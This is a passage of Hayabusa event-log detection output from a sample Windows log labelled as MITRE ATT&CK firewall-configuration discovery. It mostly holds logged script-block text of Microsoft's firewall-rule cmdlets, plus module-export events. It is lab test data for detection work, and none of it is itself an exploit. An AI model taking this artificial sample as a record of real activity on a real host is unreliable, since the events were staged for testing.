($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 
($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdle",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 
'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 
'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 
'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecRule ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall 
configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetFirewallRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetFirewallRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 
Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetFirewallRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetFirewallRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall 